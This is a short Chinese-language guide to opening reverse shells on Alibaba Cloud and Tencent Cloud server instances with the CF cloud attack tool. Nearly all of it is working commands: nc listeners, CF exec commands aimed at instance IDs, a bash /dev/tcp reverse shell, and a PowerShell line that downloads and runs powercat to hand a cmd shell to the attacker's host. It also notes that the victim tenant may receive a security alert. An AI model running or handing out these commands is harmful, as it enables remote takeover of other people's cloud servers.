# 在阿里云上反弹 Shell
首先在自己的主机上开启监听
nc -lvvp 4444
1
接着在 CF 中执行反弹 Shell 命令
--lhost参数配置为自己监听主机的 IP,--lport参数配置为自己的监听端口,-i设置要反弹 Shell 的实例 ID(如果未指定具体的实例,则 CF 会提醒是否是选择全部实例还是某个实例。)
cf alibaba ecs exec --lhost 123.123.123.123 --lport 4444 -i i-abcdefghijklmn
1
# 在腾讯云上反弹 Shell
# 云服务器
首先在自己的主机上开启监听
nc -lvvp 4444
1
接着在 CF 中执行反弹 Shell 命令
cf tencent cvm exec --lhost 123.123.123.123 --lport 4444 -i i-abcdefghijklmn
1
# 轻量应用服务器
首先在自己的主机上开启监听
nc -lvvp 4444
1
接着在 CF 中执行反弹 Shell 命令
cf tencent lh exec --lhost 123.123.123.123 --lport 4444 -i i-abcdefghijklmn
1
# 备注
在 CF 中使用的 Linux 反弹 Shell 如下
bash -i >& /dev/tcp/123.123.123.123/4444 0>&1
1
在 CF 中使用的 Windows 反弹 Shell 如下
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://ghproxy.com/raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 123.123.123.123 -p 4444 -e cmd
1
注意
- 在阿里云下反弹 Shell ,目标租户可能会收到阿里云的云盾告警消息,所以此操作需谨慎。
- 由于 CF 等待命令执行结果的默认时间是 60 秒,所以在超过 60 秒后,CF 会提示命令执行超时,从而退出程序。